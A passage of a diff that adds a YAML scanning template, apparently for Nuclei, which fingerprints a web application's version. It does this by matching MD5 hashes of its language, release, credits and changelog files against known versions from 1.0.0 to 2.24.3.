"(\"10b06c539a9780a2e711aa27d0806b70\" == md5(body))" + - type: dsl + name: 1.3.14 + dsl: + - "(\"3e9ff9122ad922cd7e65b10d392b35c9\" == md5(body))" + - type: dsl + name: 2.12.0 + dsl: + - "(\"fb0e0c7cd24f4cc58e3555d038ab3d5d\" == md5(body))" + - type: dsl + name: 2.11.1 + dsl: + - "(\"65da4c142a8054b821b06623c3814fa6\" == md5(body))" + - type: dsl + name: 2.13.1 + dsl: + - "(\"3b52794d3cde215a01fc7ffc6af93d8b\" == md5(body))" + - type: dsl + name: 2.13.0 + dsl: + - "(\"8d8684535f7103f97d1e1c15cf12ba68\" == md5(body))" + - type: dsl + name: 2.12.2 + dsl: + - "(\"8b09a615b817d8eed66e685b82bcbdfb\" == md5(body))" + - type: dsl + name: 2.12.1 + dsl: + - "(\"8489e0e6e9b15198768ae9cacd8fa0bc\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"35f18808929955e613b095ec02502c9f\" == md5(body))" + - type: dsl + name: 2.13.2 + dsl: + - "(\"6993be44ed477c192f3ea9d7ee1f1365\" == md5(body))" + - type: dsl + name: 1.3.15 + dsl: + - "(\"22a98f30df463f59e761855b3cd6cc07\" == md5(body))" + - type: dsl + name: 2.15.0 + dsl: + - "(\"451c95f8d70c4cf675137799ca7ce51a\" == md5(body))" + - type: dsl + name: 2.16.0 + dsl: + - "(\"21b74f3b593499df42ef98023a3a1976\" == md5(body))" + - type: dsl + name: 2.15.1 + dsl: + - "(\"b4aea3e6d14628a9fd6d97df2a20a8c9\" == md5(body))" + - type: dsl + name: 2.17.1 + dsl: + - "(\"ae6fd69a4607361d317c9389183c8e87\" == md5(body))" + - type: dsl + name: 2.17.0 + dsl: + - "(\"2701630dad7031458ceda7cf3d4ea330\" == md5(body))" + - type: dsl + name: 2.16.1 + dsl: + - "(\"f55f66b35d6ab471ebd89570d38fff91\" == md5(body))" + - type: dsl + name: 1.3.16 + dsl: + - "(\"8ce54dd25e14c038ba513804f27d8021\" == md5(body))" + - type: dsl + name: 2.18.0 + dsl: + - "(\"be39306a945906c77a8adf8cd704826d\" == md5(body))" + - type: dsl + name: 2.17.2 + dsl: + - "(\"e5a40c212d2be1c3aa924793f808882e\" == md5(body))" + - type: dsl + name: 2.19.0 + dsl: + - "(\"fdf5f0ab485c54e1479a4919c188054d\" == md5(body))" + - type: dsl + name: 2.18.1 + dsl: + - 
"(\"1aaa676a404e110745735772ae6daaf8\" == md5(body))" + - type: dsl + name: 1.3.17 + dsl: + - "(\"95c3e78aa9cfb04a7c4656eb56d9f399\" == md5(body))" + - type: dsl + name: 2.20.0 + dsl: + - "(\"a821c8eea95b54d204e2a4396bcfcfeb\" == md5(body))" + - type: dsl + name: 2.19.1 + dsl: + - "(\"2c43474444137e4e2b4b162139d49b3d\" == md5(body))" + - type: dsl + name: 1.3.18 + dsl: + - "(\"6a236375000b385e72d8edc7127ed5d1\" == md5(body))" + - type: dsl + name: 2.21.0 + dsl: + - "(\"3f38a295a32ebe77fc7a30cd344d01a6\" == md5(body))" + - type: dsl + name: 2.20.1 + dsl: + - "(\"8dffb729f2980dce41adab23f63db44a\" == md5(body))" + - type: dsl + name: 2.21.1 + dsl: + - "(\"a2f233b27a397d9fb7896eac0e32609b\" == md5(body))" + - type: dsl + name: 2.21.2 + dsl: + - "(\"cd1e841b94c9b7f0cae1300b72199cf4\" == md5(body))" + - type: dsl + name: 2.22.0 + dsl: + - "(\"891e2e14f477fb9f20acf2fa41b71f11\" == md5(body))" + - type: dsl + name: 2.21.3 + dsl: + - "(\"62f1dc6cef41083dd58f927d2855860c\" == md5(body))" + - type: dsl + name: 1.3.19 + dsl: + - "(\"7b04418f5bccc42d5df61541090270fb\" == md5(body))" + - type: dsl + name: 2.22.1 + dsl: + - "(\"3cd3be45a2bbdaf2e40a4bfd0886dfaf\" == md5(body))" + - type: dsl + name: 1.3.20 + dsl: + - "(\"70179191e617467b1b211cc7b0228327\" == md5(body))" + - type: dsl + name: 2.23.0 + dsl: + - "(\"234b657e8620d6974220dd7e037b248b\" == md5(body))" + - type: dsl + name: 2.22.2 + dsl: + - "(\"f8db6dbc6e3d1d35a3cde6a6138302c1\" == md5(body))" + - type: dsl + name: 2.24.0 + dsl: + - "(\"abc3f966c9137975cd1d545c07352f4c\" == md5(body))" + - type: dsl + name: 2.23.1 + dsl: + - "(\"c06b4474d29918f991332c47d506ae90\" == md5(body))" + - type: dsl + name: 2.24.1 - 2.24.3 + dsl: + - "(\"eaa653c242d60a743fafd562c24637a6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_english.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"4155fbfdce77bfe0f18b982cc3fff6e2\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - 
"(\"99209f0d8ca1c5fe3cc1b02f83a97e64\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.1 + dsl: + - "(\"fdc88ea882ac1d20d3b72aec1b144626\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"48ab853436a71f7e60878d38e672736c\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"d1b21a2b8c052519c43bb1e978b8ea31\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"ed34a80cef302a92181436ba3cb260f9\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"5e743536002c7a1e04a7142fe5617b43\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"b8efea8fd70f79013fa159970b0e0494\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.11 + dsl: + - "(\"6be4222e912eb3d0640d844ccf8191dc\" == md5(body))" + - type: dsl + name: 1.3.1 - 1.3.3 + dsl: + - "(\"cee43c094465191ff92478473328df49\" == md5(body))" + - type: dsl + name: 1.3.12 - 1.3.20 + dsl: + - "(\"207c64af823eed7eed08b02ba98e54ca\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"2e51ea8a317256ec2be99ee425d626cd\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"e5d2bc046c0fe70dbc4dfc9f26d23c6d\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"7a45b8afc01d1eaee666b9b41dbc926e\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"814ab019e377721d42631abfe0e7665b\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"587c2d756f4380cbbec79c3a909e48ba\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"563f011ddef3791e82a83613b5b8304e\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"97e5ef370d4df00e617f73374369133e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4ec2972353a9fff9c00fb8fd2f7ce3f8\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"c0e7afefe396e04609d11fd69fdde715\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"ce4b44da6dadf25085a1193941274b57\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"b1e2ce3b2be568579c499f4760b74f00\" == 
md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"e4bd88ec064091d65eba9b2329c456ac\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"819200a14dc6e8035996ed34f46167e2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"97cea4c062817644d9127dee2d7a450b\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"125094fd080cec83ad93a1085e2b49bc\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"39f466b56d601f00703a372c23bc4cc4\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"7e6f0191289ece138060b7f3b01df3c0\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"228ca8e1cd848aea3f695ddb24217ddb\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"324413d6fba214828bfd3844092b2843\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - "(\"ef05175f512d4b638b7b310cfbbfee51\" == md5(body))" + - type: dsl + name: 1.1.1 + dsl: + - "(\"9a0b40637c5d098ba972fc0ae29b0d0d\" == md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"abc01e251bfcef2b9759e4cb345f039f\" == md5(body))" + - type: dsl + name: 1.0.7 - 1.0.8 + dsl: + - "(\"e86ca112111c47f8d6cbe19281a33d22\" == md5(body))" + - type: dsl + name: 1.0.6 + dsl: + - "(\"7e6f9b15d28a26f61a8a76d36aec88f3\" == md5(body))" + - type: dsl + name: 1.0.3 - 1.0.5 + dsl: + - "(\"1af921a3a414661752e7ef2765a8c0ba\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.2 + dsl: + - "(\"38d3ed4880ab4efd54554753e60e4f01\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"ec3008350c5cf12a469dce94c6410f7e\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"0f1b0043b3501322a27ecebe3635c70b\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"48d70451cc3fa1920ea796a1ef9df909\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"013641f827c27160a5b25e9f0d154d29\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"16c90f0f0205a5f05c8c82b97700d3dd\" == md5(body))" + - type: dsl + 
name: 2.17.0 - 2.19.1 + dsl: + - "(\"55b2d7e849976aad63514282908c60a8\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"674373efb0865c70d9e8f56384caa5d2\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"f08f7a92310b50e829eb8a4f6dd0f413\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"58e6dcc6c2b1bed8ae17737c324d098f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"f3039767b45f4097c5fbb55c15e9081e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"608c047d331a5d36354ace74e757e4b0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/RELEASE" + + matchers: + - type: dsl + name: 1.2.8 - 1.2.9 + dsl: + - "(\"5e82fdef551cc247fd63faacfb7a3a65\" == md5(body))" + - type: dsl + name: 1.2.7 + dsl: + - "(\"ed1794dd8de2d48607bbe301363440cf\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"fd43d3b504b41cec74b47ca48e969ff4\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"c22f79266047e913bc24c92ad728ca25\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ff3c33f3a733760c22e2931125fd89d7\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"26b86b569b862a698acc7ac8477d8d76\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"702b524997836bb801f48fd53a7d50db\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"330d42c5b8d504b92f391805ee312836\" == md5(body))" + - type: dsl + name: 1.2.19 + dsl: + - "(\"0c80c1a3d6c7b5a4768ed1cd37722c32\" == md5(body))" + - type: dsl + name: 1.2.18 + dsl: + - "(\"012831a8af75b59eb8c6eb4bcbc3d2e7\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"959fe0af7d9b778e3d29a581f84d00b8\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"a1ceabe941ae5e0e34bf687ecf119793\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a56a91958cf6c56481d04b298bb81de8\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"50ba062b382b34081a15bb84f274396b\" == md5(body))" + - type: 
dsl + name: 1.2.13 + dsl: + - "(\"83bb2ed69ec4454832b9f750717a8786\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"84869f62809c9747f4d2c9717dde1227\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"844554f7b949a8f44235896043e27519\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"5433d69660648bf2f0296110860bb2b8\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3831129450cac7f740f3aa10d11c0277\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"e7962ec0c0def1bcebb13e1bacb9fe24\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/CREDITS" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"159090509d7cc7ee45a45b8ddaff26c4\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - "(\"b26bac0b0c4af528577409c2051ae67c\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.1 + dsl: + - "(\"4d3857e62c610467dd7cbb9f9f256bcb\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"bf0e098f652a2256ef4f89718b586653\" == md5(body))" + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"bdda5d66ef73b6659d3d9e4d9f0e3a74\" == md5(body))" + - type: dsl + name: 2.3.0 + dsl: + - "(\"bbeff3f1bc8f2fb0bd8550e63ee061f0\" == md5(body))" + - type: dsl + name: 2.2.4 + dsl: + - "(\"d333348e6e7fdb3fa46b4dea66b3f96d\" == md5(body))" + - type: dsl + name: 2.2.2 - 2.2.3 + dsl: + - "(\"c68f15a7b42312b93b262273e933e55a\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.1 + dsl: + - "(\"2097c1d0192ec4805a5ed35a242c7bd1\" == md5(body))" + - type: dsl + name: 2.1.3 + dsl: + - "(\"52de8a8258db95b709175fae2bac23c7\" == md5(body))" + - type: dsl + name: 2.1.2 + dsl: + - "(\"8939cbe1f6493e29a06b6b66d83d1d3c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.1 + dsl: + - "(\"cd39cb7d7b6e5ab794611459e63b1c1b\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"ec47e2f0ebc933a40f56b9c1ba3c1074\" == md5(body))" + - type: dsl + name: 1.3.8 - 1.3.9 + dsl: + - "(\"046241c9a8ba9c9057bbe77f573fa44e\" == md5(body))" + - type: 
dsl + name: 1.3.5 - 1.3.7 + dsl: + - "(\"32669e72a04dd2b42cd2eca876501743\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"d4b13d3c93a41ce0cb74b3d41842595d\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"aed15f3c6bd4206f95e4dd53f8bebc8b\" == md5(body))" + - type: dsl + name: 1.3.12 - 1.3.20 + dsl: + - "(\"b9e5a93b8f5a3f4688525c24328fd7f6\" == md5(body))" + - type: dsl + name: 1.3.10 - 1.3.11 + dsl: + - "(\"f0f7686a6ce9e3098137e055c58abdda\" == md5(body))" + - type: dsl + name: 1.3.1 + dsl: + - "(\"f26129495f05dacaeac364e15fc5db1a\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"9f68b0f023b364704e8836d2562050f5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"2b6e4921aff243ebf0bccebbd42e1d8e\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"cfc3ceb3cac5f3e7aa67595d48a56545\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"53257b748c633287d390d1ab00ceb305\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"fd7bf5f87938fb8005755e8b72728949\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"b2b77ddb25b0a92da80be1f5d43f0ca9\" == md5(body))" + - type: dsl + name: 1.2.19 + dsl: + - "(\"4a9a0e819488fb1d73c31051c13d5201\" == md5(body))" + - type: dsl + name: 1.2.18 + dsl: + - "(\"b1a5c8110fc5071936060ba60a6bf9a9\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"59fcab592a98a66413fbcacabab90bff\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e695146cd2c94e7eb9fe7f7e09023ea2\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"603f68a8d791e7fa156e54283e53f00d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"3251abd4170a07a73d32d1b07cd8dbb3\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e49c1fa477bf38bf705fd4c8f2daa0aa\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"388c9b03253878b197aeaebe537cd66f\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - 
"(\"21a84300604ba56d35f4fab8d7f6c459\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"c92d14d152e9a16eb08da61fb550b5f2\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"35c118bf7344ae7060a58855bb667d6d\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"b92da3b8e9d45e71094bf6df56addb19\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"618c394b5861ba11d2f17f57844dacbd\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.8.1 + dsl: + - "(\"1ac01a45bcb5de425b9af677e0c3e9ff\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"f46e81e6267ef53c1d14c03d49dc3842\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"fd2f1707fde5cf748bf16b4ac905ac96\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"ef991c9b62eb75f7b6c4295cd4f1ef90\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"953c8ca4a83b80ae6576a4419eeb9b2f\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"57cbb60f0cb5920cbe3526f6430adec5\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"e63424ef01c4b955748e458727daa17e\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"0d48c1882c1c9be0b6078597d4063771\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"efc18e25fd015edd6919c264519177a2\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"44ceaea1e718df4357358e488a253601\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"b1b3544492f9d211c856117a18302811\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"8e4a211f70271080298524fcc880c6f7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"f78d928140ebfada8df9877fd482f5a1\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"11ac87e8f5acfbdde82abf2229d898dc\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.1 + dsl: + - "(\"fe02eeaa23cdf00917847c2b4344b4f7\" == md5(body))" + - type: 
dsl + name: 2.24.2 - 2.24.3 + dsl: + - "(\"ae4fe61d44cd2f3ba079af8632186a59\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"9627c83875c4dce606ad1752a8ab909f\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"d3699fba89c96c6faf48b8552fadbe70\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"5e384ebce947f4877b0feb00c888bbe8\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"309ac9e0dfadb758355a64ffa7a902e4\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"f5c2e75b5e95e7f0062a716d42126ded\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"3f5d52649b5700ccc7664c77e5775b11\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"6ac8fb22dcaf7400c37478459b4d5a87\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"7a7cbc5b6f3033db0e3a1ff07a3f05ea\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"11956f071d8a69bb90485ea85b05bfce\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"ac312f99bab74b3849dd2ad1c2f14a89\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"35f11898c1a9202f968c9122e0ef00a4\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"3d87bb5ad88b166a0caf9501d76a215e\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"d114fc76ad6249895de840b68b9bb786\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"2cac0e6bc52e0ee4700c137a8fb0d734\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"0d870df8f69b6d3799557935bbb3c71c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"49f2ec3e31d16c090907a0b7af4f2947\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"d354bccdc430f14626207f16171c648a\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"89d8a3721f155ae83557f58f9240e22b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - 
"(\"c4d6784413b3511a734a82449132524b\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"d9989a40b02ebbdccffe4339d349e4bf\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"4924322480a912b6b04614d3aeea7b80\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"bd0bd921dac44894a9458bdbbd76455f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2fed6cd90f70aeeecc667d11f1f0eef5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5d66d018b50aab00b828b364e6be96b6\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"aaa82f56be9858a1a94d18e619df3540\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3a5434d93890b9ff4bc0a00c5c6f00da\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a252950f4cb4b509b4825e409ec9f31e\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"685e8f0c147cde37c27561635060c806\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"1a9b7e0a07644b6f0e392b5fcbe1ab7c\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - "(\"aa45bcb16e37de632aa5ef0001095444\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"4aa70be614589f343a7317f86ab9c9a8\" == md5(body))" + - type: dsl + name: 1.0.8 + dsl: + - "(\"d65ad27e1add5f2e0a2de7d7e8fa4bcf\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.7 + dsl: + - "(\"56ff2e60d6c8fd851391bc25e87b9f21\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"61396369977b32f6a042fecf16c16fea\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"cba75446b63410e229b6034d58d7ac49\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"b030cfbd173a9f928b5e07c856e10bf2\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"7ce4c4c26ed63d00d08ade010a0b287c\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"9329f284947a2e0ac8da9a162f33a37f\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"b4007d1ee599e0890a5dcbaf55329e66\" == 
md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"90343c47b58e2914216d33358712eace\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"de86660ae9259b889051518cba6a3da5\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"52e00821692754da40ba753ae460cb04\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"5316759c7ac551805ad34719ae0cebc1\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"4984a630e40bc4ac2de87d994df00d88\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"5c57a3101ce9596452ba94f11e4d9058\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"30287666d452aeaa329a70d1267cdcb4\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"ccaf6c1621f2482ebc422e3d082b3963\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"fc821018dd18f3c68c4b48a63bccedf0\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"7d8c9b2cb53a44811c6111de1ab59d6f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/ChangeLog" + + matchers: + - type: dsl + name: 1.1.8 - 1.1.9 + dsl: + - "(\"b35e373276e2d62b81bf80b35864e38f\" == md5(body))" + - type: dsl + name: 1.1.7 + dsl: + - "(\"f25632103e07cee3ce25e9a81770352c\" == md5(body))" + - type: dsl + name: 1.1.6 + dsl: + - "(\"859fcefddb85b2a26d6d6cdd6ceef799\" == md5(body))" + - type: dsl + name: 1.1.5 + dsl: + - "(\"599af64e2f7fe953f15a23cacfa70275\" == md5(body))" + - type: dsl + name: 1.1.4 + dsl: + - "(\"d5df7f5d608aa8f3789c657aec2c0591\" == md5(body))" + - type: dsl + name: 1.1.3 + dsl: + - "(\"d9c1f5fd63b5f7b04a5df28186516c04\" == md5(body))" + - type: dsl + name: 1.1.2 + dsl: + - "(\"2be68e8831f211183e235cfbe3bf4c4d\" == md5(body))" + - type: dsl + name: 1.1.1 + dsl: + - "(\"e3593a02c496e993cd50b4ba6043583d\" == md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"d4ad9b059a3a6b1f6ddc1af2a93edad0\" == md5(body))" + - type: dsl + name: 1.0.8 + dsl: + - 
"(\"83cc2fdb4c73527496a1073b0c6a5fd3\" == md5(body))" + - type: dsl + name: 1.0.7 + dsl: + - "(\"ec3add622fada697e21630cb461c1a79\" == md5(body))" + - type: dsl + name: 1.0.6 + dsl: + - "(\"58093eb98935a3e6398fb9f7f8ede940\" == md5(body))" + - type: dsl + name: 1.0.5 + dsl: + - "(\"31538703e6d8b6cb84004c9cd201a7c9\" == md5(body))" + - type: dsl + name: 1.0.4 + dsl: + - "(\"48922ce66670f9f59ad5fd38ffd91261\" == md5(body))" + - type: dsl + name: 1.0.3 + dsl: + - "(\"83b17189b6436a0bcbb1d68486ff6543\" == md5(body))" + - type: dsl + name: 1.0.2 + dsl: + - "(\"a97e34406468478541323d98938e478c\" == md5(body))" + - type: dsl + name: 1.0.1 + dsl: + - "(\"b71ca2af1b280a1d24bf223b6ff3b34d\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"e128aec3bb6fb230b1d34171660ea521\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"b86ab01a01345c0e9ea392f637d8fc6f\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"427773021df4d88176cf150da7571217\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"3f0a82b6483d662b7f66c10cbc0f47a3\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"651bbbff1899fd8c5e43cbe5910b76fb\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"e94298cbebfc933f964074f6319ffd5f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"5c5d7a2c65f85bc86ed497844f03fb46\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"4beb115356505cd687d4b3a97f8879c6\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"ff568c3c2c516c5fa9bebee3e2b88693\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"c759dde726977723c20b00e8a0602212\" == md5(body))" + - type: dsl + name: 1.3.2 - 